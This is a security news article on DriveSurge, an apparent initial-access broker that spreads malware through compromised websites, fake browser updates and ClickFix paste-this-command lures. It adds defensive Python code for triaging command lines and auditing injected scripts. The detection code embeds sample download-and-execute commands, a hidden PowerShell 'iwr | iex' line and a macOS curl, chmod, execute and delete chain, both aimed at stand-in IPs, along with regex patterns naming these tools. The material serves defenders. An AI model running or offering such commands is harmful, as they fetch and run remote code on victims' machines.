New DriveSurge Threat Actor Uses ClickFix and Fake Updates to Infect Website Visitors
Silent Push researchers have identified DriveSurge, a sophisticated threat actor using ClickFix social engineering and fake browser update pages to compromise thousands of legitimate websites.

A newly identified threat actor named DriveSurge has been quietly compromising thousands of legitimate websites to push malware onto unsuspecting visitors. Using a combination of fake browser update pages and a social engineering trick known as ClickFix, this operation ran largely undetected until now. What makes DriveSurge especially dangerous is not just its reach, but the sophistication built into its infrastructure, which automates malware delivery at scale.
DriveSurge works by injecting malicious code into high-reputation, legitimate websites without the knowledge of site owners or their visitors. When someone visits one of these compromised sites, hidden code quietly routes them through a Traffic Distribution System, or TDS. This system profiles each visitor and decides what to serve them next, so each visitor sees a lure tailored to them while the redirect itself stays out of sight.
Silent Push researchers said in a report shared with Cyber Security News that they identified DriveSurge as the primary driver behind a massive surge in ClickFix and Fake Update campaigns across the web. According to their analysis, DriveSurge operates as a specialized Initial Access Broker using a Pay-Per-Install model, where payment is collected each time a victim device is successfully infected. Those confirmed infection leads are then sold to other threat actors operating downstream.
Researchers uncovered eight distinct technical fingerprints that map out DriveSurge's malicious infrastructure, from how scripts are injected into victim sites to the registration patterns used for its domains. This level of operational detail points to a threat actor that has invested serious time into building a repeatable, scalable infection system. The group has compromised thousands of websites that redirect visitors to malware, all without site owners ever knowing.
The campaign targets a wide range of browsers, including Google Chrome, Mozilla Firefox, Microsoft Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, and UC Browser. Victims encounter either a fake browser update page or a ClickFix prompt, both designed to look completely routine and trustworthy. That familiarity is exactly what makes both methods so effective against everyday users.
DriveSurge deploys two main methods to trick users into installing malware on their own devices. In the Fake Update scenario, a compromised site displays a convincing browser update prompt that impersonates a well-known browser. Clicking the update button triggers the download of a ZIP file containing multiple DLL files and a "Browser Update.exe" file that is actually malware. The ClickFix method works differently. A fake error message instructs the victim to copy and paste a command into their terminal or PowerShell window. The command runs with the victim's own privileges and silently installs malware, and because nothing is fetched through the browser's download path, download-based controls never see it. In one confirmed instance, the ClickFix prompt tried to pull malicious code from an IP address already flagged in active threat intelligence feeds.
Analysis of obfuscated JavaScript files tied to DriveSurge revealed the attack chain does not only target Windows machines. One analyzed payload delivered macOS malware, showing that DriveSurge is actively building a cross-platform victim pool. The payload used a multi-stage shell command that downloaded a secondary file, executed it, and then deleted itself immediately to reduce forensic traces. Researchers also discovered a separate Advertisement Distribution System linked to the campaign that collects device metadata and uses behavioral signals like mouse movements, scrolls, and clicks to confirm human presence before delivering content.
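The two command-line lures described above, the pasted PowerShell one-liner and the macOS download-execute-delete chain, leave the same kind of trace in process-creation telemetry. The following added example (not code from the Silent Push report and not DriveSurge's own samples) triages captured command lines for those patterns. The sample commands, rule names, and the IP addresses in them are constructed for illustration; the patterns are generic ClickFix tradecraft, not DriveSurge-specific indicators.

```python
import re

# Constructed sample command lines as they might appear in process-creation
# logs. None of these are real DriveSurge samples; IPs are documentation ranges.
SAMPLE_COMMANDS = [
    # ClickFix-style PowerShell one-liner pasted into a Run dialog or console
    'powershell -w hidden -nop -c "iwr http://198.51.100.23/x.txt | iex"',
    # macOS chain: download, mark executable, run, then remove the file
    '/bin/sh -c "curl -fsSL http://203.0.113.7/u -o /tmp/.u && chmod +x /tmp/.u && /tmp/.u; rm -f /tmp/.u"',
    # benign administrative commands that must not be flagged
    'powershell -Command Get-Service',
    'curl -fsSL https://example.com/file.tar.gz -o file.tar.gz',
]

# Each rule is (name, regex). Names are hypothetical labels chosen for this example.
RULES = [
    # download cmdlet piped straight into Invoke-Expression
    ("ps_download_exec", re.compile(
        r'(iwr|invoke-webrequest|curl|wget|downloadstring|net\.webclient).*\|\s*(iex|invoke-expression)', re.I)),
    ("ps_hidden_window", re.compile(r'\s-(w|windowstyle)\s+hidden\b', re.I)),
    ("ps_nop_or_bypass", re.compile(r'\s-(nop|noprofile|ep|executionpolicy)\b', re.I)),
    # fetch, chmod +x, then execute in one chained shell command
    ("sh_download_chmod_exec", re.compile(r'(curl|wget)\b.*&&\s*chmod\s+\+x.*&&', re.I)),
    # the dropped file is removed in the same command that ran it
    ("sh_self_delete", re.compile(r'(;|&&)\s*rm\s+-r?f\s+', re.I)),
    ("mshta_remote", re.compile(r'mshta(\.exe)?\s+https?://', re.I)),
]

# Any single hit on these is enough to call the command suspicious.
HIGH_CONFIDENCE = {"ps_download_exec", "sh_download_chmod_exec", "mshta_remote"}

URL_RX = re.compile(r'https?://[^\s"\'|;&]+', re.I)


def analyze(cmd):
    """Return (rule hits, suspicious flag) for one command line."""
    hits = [name for name, rx in RULES if rx.search(cmd)]
    suspicious = bool(HIGH_CONFIDENCE & set(hits)) or len(hits) >= 2
    return hits, suspicious


def extract_urls(cmd):
    """Pull remote URLs out of a command line for IOC pivoting."""
    return URL_RX.findall(cmd)


def triage(commands):
    """Summarise a batch of command lines; only suspicious ones are returned."""
    results = []
    for cmd in commands:
        hits, suspicious = analyze(cmd)
        if suspicious:
            results.append({"cmd": cmd, "hits": hits, "urls": extract_urls(cmd)})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_COMMANDS):
        print(r["hits"], r["urls"])
        print("   ", r["cmd"])
```

The rules deliberately key on the shape of the command rather than on any specific host, so they keep working when the delivery infrastructure rotates; the extracted URLs are what you then match against the published indicators.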
Organizations are advised to monitor for unusual external JavaScript injections, audit third-party scripts loading from unrecognized domains, and ensure web-facing content management systems remain fully patched and access-controlled. The full list of indicators of compromise provided by Silent Push includes multiple domains and email addresses tied to DriveSurge's infrastructure, enabling defenders to block and hunt for related activity.
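The audit recommended above, checking a site's script tags against the domains it is expected to load from and flagging inline scripts that look obfuscated, can be scripted. The following is an added example (not part of the Silent Push report and not DriveSurge's own code): a scanner over a constructed HTML page containing one injected remote loader and one obfuscated inline snippet. The hostnames, the allowlist, and the marker names are assumptions chosen for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a first-party script, one approved third-party
# script, one injected loader from an unknown host, and two inline scripts,
# one of which uses common obfuscation idioms. Not a real compromised page.
SAMPLE_HTML = r"""
<html><head>
<script src="/assets/app.js"></script>
<script src="https://cdn.example-analytics.com/tag.js"></script>
<script src="https://static.tds-example.net/loader.js" async></script>
<script>var _0x4f2a=["\x68\x74"];eval(atob("YWxlcnQoMSk="));</script>
<script>document.getElementById('y').textContent = new Date().getFullYear();</script>
</head><body></body></html>
"""

SITE_HOST = "www.example.org"                     # assumed first-party host
ALLOWED_HOSTS = {"cdn.example-analytics.com"}     # assumed approved third parties

# (label, regex) pairs for idioms common in obfuscated loaders; labels are ours.
OBF_MARKERS = [
    ("eval", re.compile(r'\beval\s*\(')),
    ("atob", re.compile(r'\batob\s*\(')),
    ("fromCharCode", re.compile(r'String\.fromCharCode')),
    ("unescape", re.compile(r'\bunescape\s*\(')),
    ("hex_escape_run", re.compile(r'(\\x[0-9a-f]{2}){4,}', re.I)),
    ("hex_identifier", re.compile(r'\b_0x[0-9a-f]{3,}\b', re.I)),
]


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit(html, site_host, allowed_hosts):
    """Return findings: unapproved external hosts and obfuscated inline scripts."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).netloc.lower()
        # relative URLs have no host and are first-party by construction
        if host and host != site_host and host not in allowed_hosts:
            findings.append(("unapproved_external_script", src))
    for code in parser.inline:
        hits = [label for label, rx in OBF_MARKERS if rx.search(code)]
        if hits:
            findings.append(("obfuscated_inline_script", hits))
    return findings


if __name__ == "__main__":
    for kind, detail in audit(SAMPLE_HTML, SITE_HOST, ALLOWED_HOSTS):
        print(kind, detail)
```

Run this against the rendered HTML of each page template rather than a single URL, since injected loaders are often added to a theme or plugin file that every page includes; a new host appearing in the "unapproved" list between two scans is the signal worth escalating.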